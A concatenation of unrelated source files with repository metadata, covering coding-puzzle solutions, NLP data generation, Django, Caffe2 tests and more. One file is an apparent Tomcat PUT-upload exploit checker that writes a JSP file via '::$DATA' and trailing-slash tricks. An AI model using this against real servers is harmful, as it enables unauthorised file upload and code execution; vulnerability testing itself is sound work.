| 2019-01-18T05:16:46 | 2018-01-05T01:23:35 |
Python
|
UTF-8
|
Python
| false | false | 643 |
py
|
import logging
logger = logging.getLogger(__name__)
def set_pw(isamAppliance, password, check_mode=False, force=False):
"""
Changing the administrator password of the embedded LDAP server
"""
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_post("Changing the administrator password of the embedded LDAP server",
"/isam/embedded_ldap/change_pwd/v1",
{
"password": password
})
|
[
"[email protected]"
] | |
be65e8b6843e01ce485befc48c2d14bde2967dea
|
7bc54bae28eec4b735c05ac7bc40b1a8711bb381
|
/src/contradiction/medical_claims/alamri/tfrecord_gen.py
|
5ddfa13b77c7f7eda2cea802707861ff4e6e6373
|
[] |
no_license
|
clover3/Chair
|
755efd4abbd5f3f2fb59e9b1bc6e7bc070b8d05e
|
a2102ebf826a58efbc479181f1ebb5de21d1e49f
|
refs/heads/master
| 2023-07-20T17:29:42.414170 | 2023-07-18T21:12:46 | 2023-07-18T21:12:46 | 157,024,916 | 0 | 0 | null | 2023-02-16T05:20:37 | 2018-11-10T21:55:29 |
Python
|
UTF-8
|
Python
| false | false | 3,932 |
py
|
import json
import os
from typing import Iterator
from contradiction.medical_claims.alamri.pairwise_gen import enum_true_instance, enum_neg_instance, enum_neg_instance2, \
enum_neg_instance_diff_review
from contradiction.medical_claims.biobert.voca_common import get_biobert_tokenizer
from cpath import at_output_dir, output_path
from data_generator.cls_sep_encoder import get_text_pair_encode_fn, PairedInstance
from data_generator.tokenizer_wo_tf import get_tokenizer
from misc_lib import DataIDManager, exist_or_mkdir
from tf_util.record_writer_wrap import write_records_w_encode_fn
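# NLI-style label ids; generate_inner below labels every generated pair Neutral.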
Entailment = 0
Neutral = 1
Contradiction = 2
def generate_true_pairs(data_id_man):
yield from generate_inner(data_id_man, enum_true_instance)
def generate_neg_pairs(data_id_man):
enum_fn = enum_neg_instance
yield from generate_inner(data_id_man, enum_fn)
def generate_neg_pairs2(data_id_man) -> Iterator[PairedInstance]:
enum_fn = enum_neg_instance2
yield from generate_inner(data_id_man, enum_fn)
def generate_neg_pairs_diff_review(data_id_man):
enum_fn = enum_neg_instance_diff_review
yield from generate_inner(data_id_man, enum_fn)
def generate_inner(data_id_man, enum_fn) -> Iterator[PairedInstance]:
for c1, c2, pair_type in enum_fn():
info = {
'text1': c1.text,
'text2': c2.text,
'pair_type': pair_type
}
inst = PairedInstance(c1.text, c2.text, data_id_man.assign(info), Neutral)
yield inst
def generate_and_write(file_name, generate_fn, tokenizer):
data_id_man = DataIDManager()
inst_list = generate_fn(data_id_man)
max_seq_length = 300
save_path = at_output_dir("alamri_tfrecord", file_name)
encode_fn = get_text_pair_encode_fn(max_seq_length, tokenizer)
write_records_w_encode_fn(save_path, encode_fn, inst_list)
info_save_path = at_output_dir("alamri_tfrecord", file_name + ".info")
json.dump(data_id_man.id_to_info, open(info_save_path, "w"))
def bert_true_pairs():
tokenizer = get_tokenizer()
file_name = "bert_true_pairs"
generate_fn = generate_true_pairs
generate_and_write(file_name, generate_fn, tokenizer)
def bert_neg_pairs():
tokenizer = get_tokenizer()
file_name = "bert_neg_pairs"
generate_fn = generate_neg_pairs
generate_and_write(file_name, generate_fn, tokenizer)
def biobert_true_pairs():
tokenizer = get_biobert_tokenizer()
file_name = "biobert_true_pairs"
generate_fn = generate_true_pairs
generate_and_write(file_name, generate_fn, tokenizer)
def biobert_neg_pairs():
tokenizer = get_biobert_tokenizer()
file_name = "biobert_neg_pairs"
generate_fn = generate_neg_pairs
generate_and_write(file_name, generate_fn, tokenizer)
def bert_neg_pairs2():
tokenizer = get_tokenizer()
file_name = "bert_neg_pairs2"
generate_fn = generate_neg_pairs2
generate_and_write(file_name, generate_fn, tokenizer)
def biobert_neg_pairs2():
tokenizer = get_biobert_tokenizer()
file_name = "biobert_neg_pairs2"
generate_fn = generate_neg_pairs2
generate_and_write(file_name, generate_fn, tokenizer)
def bert_neg_pairs_diff_review():
tokenizer = get_tokenizer()
file_name = "bert_neg_pairs_diff_review"
generate_fn = generate_neg_pairs_diff_review
generate_and_write(file_name, generate_fn, tokenizer)
def biobert_neg_pairs_diff_review():
tokenizer = get_biobert_tokenizer()
file_name = "biobert_neg_pairs_diff_review"
generate_fn = generate_neg_pairs_diff_review
generate_and_write(file_name, generate_fn, tokenizer)
def main():
exist_or_mkdir(os.path.join(output_path, "alamri_tfrecord"))
bert_neg_pairs_diff_review()
biobert_neg_pairs_diff_review()
# bert_neg_pairs2()
# biobert_neg_pairs2()
# bert_true_pairs()
# bert_neg_pairs()
# biobert_true_pairs()
# biobert_neg_pairs()
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
b324821f4e1cb588672bdca6d07e05ff834b9547
|
a939ec03a7eb31962817d6cffea7f125ea4d69db
|
/DataScience/pandas/Example02_series.py
|
9983ac491066a66c45841303c88fcc293db3bfb3
|
[] |
no_license
|
dipayandutta/python3
|
e21e50d7a21315bc63702a103af79f3d61d91ab1
|
f3d01ea52d05a23103cf86afbf5dff64a5d36634
|
refs/heads/master
| 2022-12-10T09:13:04.967400 | 2021-07-25T15:20:40 | 2021-07-25T15:20:40 | 153,072,927 | 0 | 0 | null | 2022-11-22T02:24:01 | 2018-10-15T07:46:28 |
Python
|
UTF-8
|
Python
| false | false | 144 |
py
|
#Manually assign index values to a series
import pandas as pd
series = pd.Series(['Dipayan','Ruby'],index=['Husband','spouse'])
print(series)
|
[
"[email protected]"
] | |
5f956a3f925ac4a9a724e8128b079d5b8afa2c82
|
45734abde30b437c2a1ba80653d7323e5c1d8c7f
|
/python/0320_generalized_abbreviation.py
|
f56e22143bc7bf3043f75dbf895dd29533b46079
|
[] |
no_license
|
rdtr/leetcode_solutions
|
6629e03dd5b5fee15aaabe7f53204778f237ed96
|
51800d33c57e36ef62b6067d6f91a82c0e55dc6d
|
refs/heads/main
| 2022-05-21T12:17:23.201832 | 2022-03-12T09:20:46 | 2022-03-12T09:20:46 | 80,395,988 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 717 |
py
|
from collections import deque
class Solution:
def generateAbbreviations(self, word: str) -> List[str]:
res = []
self.helper(word, 0, 0, '', res)
return res
def helper(self, word, pos, length, cur, res):
if pos >= len(word):
if length > 0:
cur += str(length)
res.append(cur)
return
if length == 0: # just consume one character
self.helper(word, pos + 1, 0, cur + word[pos], res)
else: # perform abbr
self.helper(word, pos + 1, 0, cur + str(length) + word[pos], res)
# skip this character and increment abbr length
self.helper(word, pos + 1, length + 1, cur, res)
|
[
"[email protected]"
] | |
0991be737f49582ec10aa7eedbd0a61d6dfe7b40
|
9b0bdebe81e558d3851609687e4ccd70ad026c7f
|
/剑指offer/02.从尾到头打印链表.py
|
c171768fb4cf4ebffccff7c7bf930ebb8b0066c0
|
[] |
no_license
|
lizenghui1121/DS_algorithms
|
645cdad007ccbbfa82cc5ca9e3fc7f543644ab21
|
9690efcfe70663670691de02962fb534161bfc8d
|
refs/heads/master
| 2022-12-13T22:45:23.108838 | 2020-09-07T13:40:17 | 2020-09-07T13:40:17 | 275,062,257 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 509 |
py
|
"""
Given a linked list, return its node values in tail-to-head order as an ArrayList.
@Author: Li Zenghui
@Date: 2020-03-02 20:10
"""
# -*- coding:utf-8 -*-
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
    # Return the node values from tail to head as a list, e.g. [1, 2, 3]
def printListFromTailToHead(self, listNode):
res = []
p = listNode
while p:
res.insert(0, p.val)
p = p.next
return res
|
[
"[email protected]"
] | |
b08c2c670bcb0c5c3ca004b5b5e8ae7656f10ffa
|
369b985626c565096a3e65635542ac708339b329
|
/blog/urls.py
|
9a3cbcfd3770f5beceeffc016a5790b887880504
|
[
"MIT"
] |
permissive
|
ernestmucheru/Week4-IP
|
9a68b28a127d8746d777d7b67e2cc055d034980c
|
be80372a33cbc3e80644915db66e0bf51cced175
|
refs/heads/main
| 2023-06-27T19:45:48.071039 | 2021-07-27T06:34:22 | 2021-07-27T06:34:22 | 389,307,262 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 646 |
py
|
from django.urls import path
# from .views import (PostListView,PostDetailView,PostCreateView,PostUpdateView,PostDeleteView)
from . import views
urlpatterns =[
# path('', PostListView.as_view(), name='blog'),
# path('post/<int:pk>/', PostDetailView.as_view(), name='post-detail'),
# path('post/new/', PostCreateView.as_view(), name='post-create'),
# path('post/<int:pk>/update/', PostUpdateView.as_view(), name='post-update'),
# path('post/<int:pk>/delete/', PostDeleteView.as_view(), name='post-delete'),
path('new-post', views.create_post, name='post'),
path('<hood_id>/new-post', views.create_post, name='post')
]
|
[
"[email protected]"
] | |
2f9e3f9b1f607d3f89fc3e056f19fcccad2f74fe
|
28a462a28f443c285ca5efec181ebe36b147c167
|
/tests/compile/basic/recent/String.prototype.startsWith.spec
|
ba62e090c26d2ee9be97ca1a97a2010796ad2856
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
kaist-plrg/jstar
|
63e71f9156860dc21cccc33a9f6c638dfee448ea
|
1282919127ea18a7e40c7a55e63a1ddaaf7d9db4
|
refs/heads/main
| 2022-07-22T08:12:34.947712 | 2022-02-27T04:19:33 | 2022-02-27T11:06:14 | 384,045,526 | 6 | 4 |
NOASSERTION
| 2022-02-27T11:05:26 | 2021-07-08T07:53:21 |
Python
|
UTF-8
|
Python
| false | false | 884 |
spec
|
1. Let _O_ be ? RequireObjectCoercible(*this* value).
1. Let _S_ be ? ToString(_O_).
1. Let _isRegExp_ be ? IsRegExp(_searchString_).
1. If _isRegExp_ is *true*, throw a *TypeError* exception.
1. Let _searchStr_ be ? ToString(_searchString_).
1. Let _len_ be the length of _S_.
1. If _position_ is *undefined*, let _pos_ be 0; else let _pos_ be ? ToIntegerOrInfinity(_position_).
1. Let _start_ be the result of clamping _pos_ between 0 and _len_.
1. Let _searchLength_ be the length of _searchStr_.
1. If _searchLength_ = 0, return *true*.
1. Let _end_ be _start_ + _searchLength_.
1. If _end_ > _len_, return *false*.
1. Let _substring_ be the substring of _S_ from _start_ to _end_.
1. Return ! SameValueNonNumeric(_substring_, _searchStr_).
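A rough Python sketch of the algorithm above (illustrative only: ToIntegerOrInfinity and the IsRegExp check are simplified to a plain int() conversion and an isinstance() test):
import re
def starts_with(s, search_string, position=None):
    if isinstance(search_string, re.Pattern):       # steps 3-4
        raise TypeError("searchString must not be a RegExp")
    search_str = str(search_string)                 # step 5
    length = len(s)                                 # step 6
    pos = 0 if position is None else int(position)  # step 7 (simplified)
    start = max(0, min(pos, length))                # step 8: clamp
    if len(search_str) == 0:                        # steps 9-10
        return True
    end = start + len(search_str)                   # step 11
    if end > length:                                # step 12
        return False
    return s[start:end] == search_str               # steps 13-14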
|
[
"[email protected]"
] | |
9d0b0a941398fd991247b3a0ec96412244d364c5
|
30fe7671b60825a909428a30e3793bdf16eaaf29
|
/.metadata/.plugins/org.eclipse.core.resources/.history/9a/f0d15008ccf800161174a93fd5908e78
|
96f863b8b89de32901e8cf640c731bc4ebefeb38
|
[] |
no_license
|
abigdream84/PythonStudy
|
0fc7a3b6b4a03a293b850d0ed12d5472483c4fb1
|
059274d3ba6f34b62ff111cda3fb263bd6ca8bcb
|
refs/heads/master
| 2021-01-13T04:42:04.306730 | 2017-03-03T14:54:16 | 2017-03-03T14:54:16 | 79,123,274 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 983 |
#!/usr/bin/env python
#coding:UTF-8
from audit_demo.utility.MySqlHelper import MySqlHelper
class g_table(object):
def __init__(self):
self.__helper = MySqlHelper()
def add_grp(self,gpname):
sql = 'insert into g_table(g_name) values(%s)'
try:
self.__helper.insert(sql,gpname)
return True
except Exception as e:
print(e)
return False
    def get_grp(self,gpname):
        sql = 'select g_name from g_table where g_name = %s'
        g_id = None  # avoid a NameError if the query raises
        try:
            g_id = self.__helper.select(sql,gpname)
        except Exception as e:
            print(e)
        return g_id
def upd_grp(self,g_name_old,g_name_new):
sql = 'update g_table set g_name = %s where g_name = %s'
params = (g_name_new, g_name_old)
try:
self.__helper.update(sql,params)
except Exception as e:
print(e)
t=g_table()
t.add_grp('gp1')
|
[
"[email protected]"
] | ||
d78e9b91414cf74ab0da36fd5f6de8f911a9e0cd
|
53eee7eb899cb518983008532257037fb89def13
|
/2579.count-total-number-of-colored-cells.py
|
eb2d7d5de90aeac6f2c95bbec4eef4b247461260
|
[] |
no_license
|
chenxu0602/LeetCode
|
0deb3041a66cb15e12ed4585bbe0fefce5dc6b26
|
3dc5af2bc870fcc8f2142130fcd2b7cab8733151
|
refs/heads/master
| 2023-07-05T19:26:21.608123 | 2023-07-02T08:35:35 | 2023-07-02T08:35:35 | 233,351,978 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 273 |
py
|
#
# @lc app=leetcode id=2579 lang=python3
#
# [2579] Count Total Number of Colored Cells
#
# @lc code=start
class Solution:
def coloredCells(self, n: int) -> int:
# return n * n + (n - 1) * (n - 1)
return 2 * n * (n - 1) + 1
# @lc code=end
|
[
"[email protected]"
] | |
3c74be0064501659bed8cf392ce9d5f5ca0414a4
|
bede337b5ee193bb5669c855b70a78d929dc5ae8
|
/apps/one_password.py
|
ca9110f9a15ed7b774c7eb7f446788b5cfa0d019
|
[
"0BSD"
] |
permissive
|
dwiel/talon-user
|
ffe83c05e054626431fe12c14dbfe850950fa4c4
|
559617135408ea2ceafaef54564438405546f255
|
refs/heads/master
| 2020-09-12T22:58:36.575833 | 2019-11-19T17:12:05 | 2019-11-19T17:12:05 | 222,585,938 | 0 | 0 |
NOASSERTION
| 2019-11-19T02:00:20 | 2019-11-19T02:00:19 | null |
UTF-8
|
Python
| false | false | 217 |
py
|
from talon import ctrl
from talon.voice import Context, Key
from ..utils import text, delay
ctx = Context("1password")
ctx.keymap({
"password [<dgndictation>] [over]": [Key("shift-cmd-\\"), delay(0.2), text],
})
|
[
"[email protected]"
] | |
050f2631f6b47527fb3ebdc876e7b392d2199011
|
3ffb51fa2241cba9c9680ab01f8da4057861f849
|
/collezione/migrations/0023_auto_20181102_1526.py
|
a6e5117963a13b170e60c828a4b8d205856cf3f5
|
[] |
no_license
|
mions1/Euros
|
a663d9e3a38de56c51091233e6b4fc6db3147fb2
|
faa74139e178b2c9dc868a536518715bed91c676
|
refs/heads/master
| 2020-04-08T00:12:45.713416 | 2018-11-23T14:35:45 | 2018-11-23T14:35:45 | 158,842,175 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 755 |
py
|
# Generated by Django 2.1.2 on 2018-11-02 15:26
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('collezione', '0022_auto_20181030_2030'),
]
operations = [
migrations.AddField(
model_name='acquisto',
name='prezzo',
field=models.FloatField(default=0.0),
),
migrations.AlterField(
model_name='acquisto',
name='data',
field=models.DateField(default=django.utils.timezone.now),
),
migrations.AlterField(
model_name='possiede',
name='prezzo',
field=models.FloatField(default=0.0, null=True),
),
]
|
[
"[email protected]"
] | |
e5fb1f72e9850b7e778c6e302a06e49f892d630d
|
6c219c027c7d0ef454bdeac196bd773e8b95d602
|
/system/tomcat/tomcat_put_exec.py
|
5d95b87eb442bce192ffbb30043ed14ef2a86d4f
|
[] |
no_license
|
aStrowxyu/pocscan
|
663f3a3458140e1bce7b4dc3702c6014a4c9ac92
|
08c7e7454c6b7c601bc54c21172c4788312603b1
|
refs/heads/master
| 2020-04-19T10:00:56.569105 | 2019-01-29T09:31:31 | 2019-01-29T09:31:31 | 168,127,418 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,561 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: Tomcat code execution vulnerability (CVE-2017-12616)
referer: https://mp.weixin.qq.com/s/dgWT3Cgf1mQs-IYxeID_Mw
author: Lucifer
description: When Tomcat runs on a Windows host and the HTTP PUT method is enabled (for example, the readonly init-parameter is changed from its default to false), an attacker can upload a crafted JSP file containing arbitrary code to the server, and the code in that JSP file can then be executed by the server.
Affected versions: Apache Tomcat 7.0.0 - 7.0.79 (the fix in 7.0.81 is incomplete).
'''
import sys
import time
import hashlib
import requests
import datetime
import warnings
from termcolor import cprint
class tomcat_put_exec_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
post_data = "thisisashell"
time_stamp = time.mktime(datetime.datetime.now().timetuple())
m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
md5_str = m.hexdigest()
vulnurl = self.url + "/" + md5_str +".jsp::$DATA"
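        # The NTFS "::$DATA" suffix (and the trailing "/" variant tried below) keeps
        # the path out of the *.jsp servlet mapping, so the default servlet accepts
        # the PUT and writes a real .jsp to disk (the CVE-2017-12615/12616 behaviour).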
try:
req = requests.put(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if req.status_code == 201:
                cprint("[+] Tomcat code-execution vulnerability found...(high risk)\tpayload: "+vulnurl+"\tshellpath: "+self.url+"/"+md5_str+".jsp", "red")
            else:
                cprint("[-] tomcat_put_exec vulnerability not found", "white", "on_grey")
        except:
            cprint("[-] "+__file__+"====> probably not vulnerable", "cyan")
time_stamp = time.mktime(datetime.datetime.now().timetuple())
m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
md5_str = m.hexdigest()
vulnurl = self.url + "/" + md5_str +".jsp/"
try:
req = requests.put(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if req.status_code == 201:
                cprint("[+] Tomcat code-execution vulnerability found...(high risk)\tpayload: "+vulnurl+"\tshellpath: "+self.url+"/"+md5_str+".jsp", "red")
            else:
                cprint("[-] tomcat_put_exec vulnerability not found", "white", "on_grey")
        except:
            cprint("[-] "+__file__+"====> probably not vulnerable", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = tomcat_put_exec_BaseVerify(sys.argv[1])
testVuln.run()
|
[
"[email protected]"
] | |
e06edc9ef4206d01ba268cd77e82b51af3988588
|
00f3468d8917ac0c1b4df8b4dc50e82c0d9be3fa
|
/seqsfromfasta.py
|
f7aa0be287db92eee1959c13a03c700c3416c9e7
|
[] |
no_license
|
berkeleyphylogenomics/BPG_utilities
|
4e332bb401b8c057502a1a0a1d532396bfff9542
|
bbf5df137a0a459598c3f9073d80f0086e5f7550
|
refs/heads/master
| 2021-01-01T19:21:13.740575 | 2014-11-05T18:40:31 | 2014-11-05T18:40:31 | 24,867,074 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 572 |
py
|
#!/usr/bin/env python
from Bio import SeqIO
def seqpull(h, *args): #should use 'any' in py > 2.3
return ''.join([seq.format('fasta') for seq in SeqIO.parse(h,'fasta') \
if sum([seq.id.count(arg) for arg in args])])
if __name__ == '__main__':
import sys
if len(sys.argv) < 3:
print "%s: get sequences from a fasta file by substring in defline" \
% sys.argv[0]
print "USAGE: %s <multiple fasta file> [keywords]" % sys.argv[0]
else:
h = open(sys.argv[1])
print seqpull(h,*sys.argv[2:])
h.close()
|
[
"[email protected]"
] | |
0de765120183e963c96ef35cf7a5098d79f772b4
|
21e5825959a886787a3915ff0d3efa86d9cd3702
|
/combat/finishers/impale.py
|
7b32166eb2c800a2409971f38f6bb0c6ea4ef7f5
|
[
"MIT"
] |
permissive
|
ChrisLR/Python-Roguelike-Template
|
e0df37752907377e606197f2469fda61202129d5
|
9b63742b0111c7e9456fb98a96a3cd28d41a1e10
|
refs/heads/master
| 2021-06-26T07:48:39.215338 | 2017-09-14T21:46:08 | 2017-09-14T21:46:08 | 69,761,175 | 0 | 0 | null | 2017-09-14T21:46:09 | 2016-10-01T20:09:24 |
Python
|
UTF-8
|
Python
| false | false | 2,188 |
py
|
from combat.enums import DamageType
from combat.finishers.base import Finisher
from echo import functions
from util import gridhelpers
class Impale(Finisher):
name = "Impale"
description = "Impale your enemy with a slashing or piercing weapon."
attacker_message = "You impale {defender}'s {defender_bodypart} with your {attacker_weapon}"
observer_message = "{attacker} impales {defender} {defender_bodypart} with {attacker_his} {attacker_weapon}"
@classmethod
def evaluate(cls, attack_result):
if attack_result.context.distance_to <= 1:
attacker_weapon = attack_result.context.attacker_weapon
if attacker_weapon and hasattr(attacker_weapon, 'weapon'):
weapon_component = attacker_weapon.weapon
if weapon_component:
if weapon_component.melee_damage_type in (DamageType.Pierce, DamageType.Slash):
return True
return False
@classmethod
def execute(cls, attack_result):
return cls.get_message(attack_result)
@classmethod
def get_message(cls, attack_result):
attacker = attack_result.context.attacker
defender = attack_result.context.defender
attacker_weapon = attack_result.context.attacker_weapon
if attacker.is_player:
message = cls.attacker_message.format(
defender=defender.name,
defender_bodypart=attack_result.body_part_hit.name,
attacker_weapon=attacker_weapon.name,
)
else:
message = cls.observer_message.format(
attacker=functions.get_name_or_string(attacker),
defender=functions.names_or_your(defender),
defender_bodypart=attack_result.body_part_hit.name,
attacker_his=functions.his_her_it(attacker),
attacker_weapon=attacker_weapon.name
)
if defender.body.blood:
message += " splashing {blood} behind {defender_him}!!\n".format(
blood=defender.body.blood.name,
defender_him=functions.him_her_it(defender)
)
return message
|
[
"[email protected]"
] | |
106b49f1d09d2c07ec615d4ff6eada48156bac0f
|
ed3c924c42baa3ab825a482efc15f85a32c06eaa
|
/boj16649.py
|
471eee9a27c32f61b4009e52d88b52912bb2b19c
|
[] |
no_license
|
JoinNova/baekjoon
|
95e94a7ccae51103925e515d765ebda7b6fffeed
|
33b900696ecf2a42b8e452fdeae6ee482143e37e
|
refs/heads/master
| 2020-04-16T22:25:31.577968 | 2019-04-28T04:25:24 | 2019-04-28T04:25:24 | 165,966,949 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 469 |
py
|
#boj16649 Building a Stair
def stair(cube):
cnt=cube
row=(cube+1)//2
print(row+1)
pic='.'*(row+1)+'\n'
for i in range(row):
for j in range(row):
if j==0 or i==row-1:
pic+='o';cnt-=1
elif cube%2==0 and i==row-2 and j==1:
pic+='o';cnt-=1;
else:
pic+='.'
pic+='.\n'
print(pic.strip())
#print(cnt)
n=int(input())
if n==2:print(-1)
else:stair(n)
|
[
"[email protected]"
] | |
65e9e8ebbf9a9682f5fb9acfd790fad23e123824
|
99e44f844d78de330391f2b17bbf2e293bf24b1b
|
/pytorch/caffe2/quantization/server/group_norm_dnnlowp_op_test.py
|
b6acc900437ce89c4bd5c4ea17a400c9b8d47839
|
[
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] |
permissive
|
raghavnauhria/whatmt
|
be10d57bcd6134dd5714d0c4058abd56a1b35a13
|
c20483a437c82936cb0fb8080925e37b9c4bba87
|
refs/heads/master
| 2022-12-04T05:39:24.601698 | 2019-07-22T09:43:30 | 2019-07-22T09:43:30 | 193,026,689 | 0 | 1 |
MIT
| 2022-11-28T17:50:19 | 2019-06-21T03:48:20 |
C++
|
UTF-8
|
Python
| false | false | 4,517 |
py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import collections
import caffe2.python.hypothesis_test_util as hu
import hypothesis.strategies as st
import numpy as np
from caffe2.python import core, dyndep, utils, workspace
from caffe2.quantization.server import utils as dnnlowp_utils
from dnnlowp_test_utils import check_quantized_results_close
from hypothesis import given
dyndep.InitOpsLibrary("//caffe2/caffe2/quantization/server:dnnlowp_ops")
workspace.GlobalInit(["caffe2", "--caffe2_omp_num_threads=11"])
class DNNLowPOpGroupNormTest(hu.HypothesisTestCase):
@given(
N=st.integers(1, 4),
G=st.integers(2, 4),
K=st.integers(2, 12),
H=st.integers(4, 16),
W=st.integers(4, 16),
order=st.sampled_from(["NCHW", "NHWC"]),
in_quantized=st.booleans(),
out_quantized=st.booleans(),
weight_quantized=st.booleans(),
**hu.gcs_cpu_only
)
def test_dnnlowp_group_norm(
self,
N,
G,
K,
H,
W,
order,
in_quantized,
out_quantized,
weight_quantized,
gc,
dc,
):
C = G * K
X = np.random.rand(N, C, H, W).astype(np.float32) * 5.0 - 1.0
if order == "NHWC":
X = utils.NCHW2NHWC(X)
gamma = np.random.rand(C).astype(np.float32) * 2.0 - 1.0
beta = np.random.randn(C).astype(np.float32) - 0.5
Output = collections.namedtuple("Output", ["Y", "op_type", "engine"])
outputs = []
op_engine_list = [
("GroupNorm", ""),
("GroupNorm", "DNNLOWP"),
("Int8GroupNorm", "DNNLOWP"),
]
for op_type, engine in op_engine_list:
net = core.Net("test_net")
do_quantize = "DNNLOWP" in engine and in_quantized
do_dequantize = "DNNLOWP" in engine and out_quantized
do_quantize_weight = (
engine == "DNNLOWP" and weight_quantized and len(outputs) > 0
)
if do_quantize:
quantize = core.CreateOperator(
"Quantize", ["X"], ["X_q"], engine=engine, device_option=gc
)
net.Proto().op.extend([quantize])
if do_quantize_weight:
int8_given_tensor_fill, gamma_q_param = dnnlowp_utils.create_int8_given_tensor_fill(
gamma, "gamma_q"
)
net.Proto().op.extend([int8_given_tensor_fill])
X_q_param = dnnlowp_utils.choose_quantization_params(X.min(), X.max())
int8_bias_tensor_fill = dnnlowp_utils.create_int8_bias_tensor_fill(
beta, "beta_q", X_q_param, gamma_q_param
)
net.Proto().op.extend([int8_bias_tensor_fill])
group_norm = core.CreateOperator(
op_type,
[
"X_q" if do_quantize else "X",
"gamma_q" if do_quantize_weight else "gamma",
"beta_q" if do_quantize_weight else "beta",
],
["Y_q" if do_dequantize else "Y"],
dequantize_output=0 if do_dequantize else 1,
group=G,
order=order,
is_test=True,
engine=engine,
device_option=gc,
)
if do_quantize_weight:
# When quantized weight is provided, we can't rescale the
# output dynamically by looking at the range of output of each
# batch, so here we provide the range of output observed from
# fp32 reference implementation
dnnlowp_utils.add_quantization_param_args(group_norm, outputs[0][0])
net.Proto().op.extend([group_norm])
if do_dequantize:
dequantize = core.CreateOperator(
"Dequantize", ["Y_q"], ["Y"], engine=engine, device_option=gc
)
net.Proto().op.extend([dequantize])
self.ws.create_blob("X").feed(X, device_option=gc)
self.ws.create_blob("gamma").feed(gamma, device_option=gc)
self.ws.create_blob("beta").feed(beta, device_option=gc)
self.ws.run(net)
outputs.append(
Output(Y=self.ws.blobs["Y"].fetch(), op_type=op_type, engine=engine)
)
check_quantized_results_close(outputs, atol_scale=2.0)
|
[
"[email protected]"
] | |
2095829a72d1af19ee231c7ec670bf65766c274d
|
fd625e2ea155455c96261c8656a51be22fe420c8
|
/Python/euler035.py
|
4400059a3e93b485f3924881b3fe16cd51c435bb
|
[
"MIT"
] |
permissive
|
AnuragAnalog/project_euler
|
9b84a6aa0061ad4582c8d0059c3c1eaddd844fd2
|
8babbefbd5b7008ad24509f24a9d5f50ba208f45
|
refs/heads/master
| 2021-12-12T12:07:29.338791 | 2021-11-01T04:26:44 | 2021-11-01T04:26:44 | 210,749,964 | 6 | 16 |
MIT
| 2021-11-01T04:26:45 | 2019-09-25T03:44:37 |
Python
|
UTF-8
|
Python
| false | false | 1,240 |
py
|
#!/usr/bin/python3
"""
The number, 197, is called a circular prime because all rotations of the digits: 197, 971, and 719, are themselves prime.
There are thirteen such primes below 100: 2, 3, 5, 7, 11, 13, 17, 31, 37, 71, 73, 79, and 97.
How many circular primes are there below one million?
"""
import numpy as np
def isprime(num: int) -> bool:
for i in range(2, int(np.sqrt(num))+1):
if num%i == 0:
return False
return True
def rotate(num: int) -> set:
rot = {num}
length = len(str(num))
k = 0
while k < length:
tmp = list(str(num))
dig = tmp[0]
tmp[:] = tmp[1:]
tmp.append(dig)
num = ''.join(tmp)
rot.add(int(num))
k = k + 1
return rot
def euler35() -> int:
tot = 0
c_primes = [2]
flag = False
for i in range(3, 10**6, 2):
if isprime(i):
flag = True
tmp = set()
cps = rotate(i)
for x in cps:
if isprime(x):
tmp.add(x)
else:
flag = False
break
if flag:
c_primes.extend(list(tmp))
return len(set(c_primes))
tot = euler35()
print(tot)
|
[
"[email protected]"
] | |
a7114ae73b29642ae1b3b76a8eca40595de9439d
|
df7f13ec34591fe1ce2d9aeebd5fd183e012711a
|
/hata/discord/embed/embed/tests/test__parse_author.py
|
fb71e365acb11fa7c73817ca0ef5c02ff77884b6
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
HuyaneMatsu/hata
|
63e2f6a2d7a7539fd8f18498852d9d3fe5c41d2e
|
53f24fdb38459dc5a4fd04f11bdbfee8295b76a4
|
refs/heads/master
| 2023-08-20T15:58:09.343044 | 2023-08-20T13:09:03 | 2023-08-20T13:09:03 | 163,677,173 | 3 | 3 |
Apache-2.0
| 2019-12-18T03:46:12 | 2018-12-31T14:59:47 |
Python
|
UTF-8
|
Python
| false | false | 481 |
py
|
import vampytest
from ...embed_author import EmbedAuthor
from ..fields import parse_author
def test__parse_author():
"""
Tests whether ``parse_author`` works as intended.
"""
author = EmbedAuthor(name = 'hell')
for input_data, expected_output in (
({}, None),
({'author': None}, None),
({'author': author.to_data()}, author),
):
output = parse_author(input_data)
vampytest.assert_eq(output, expected_output)
|
[
"[email protected]"
] | |
df22c26d03c9eb5404718fa0aee45e5b9bfd5116
|
9b422078f4ae22fe16610f2ebc54b8c7d905ccad
|
/xlsxwriter/test/comparison/test_image01.py
|
81559d51c09a291a0dd6ef1c9b9f4f8d5f70ee88
|
[
"BSD-2-Clause-Views"
] |
permissive
|
projectsmahendra/XlsxWriter
|
73d8c73ea648a911deea63cb46b9069fb4116b60
|
9b9d6fb283c89af8b6c89ad20f72b8208c2aeb45
|
refs/heads/master
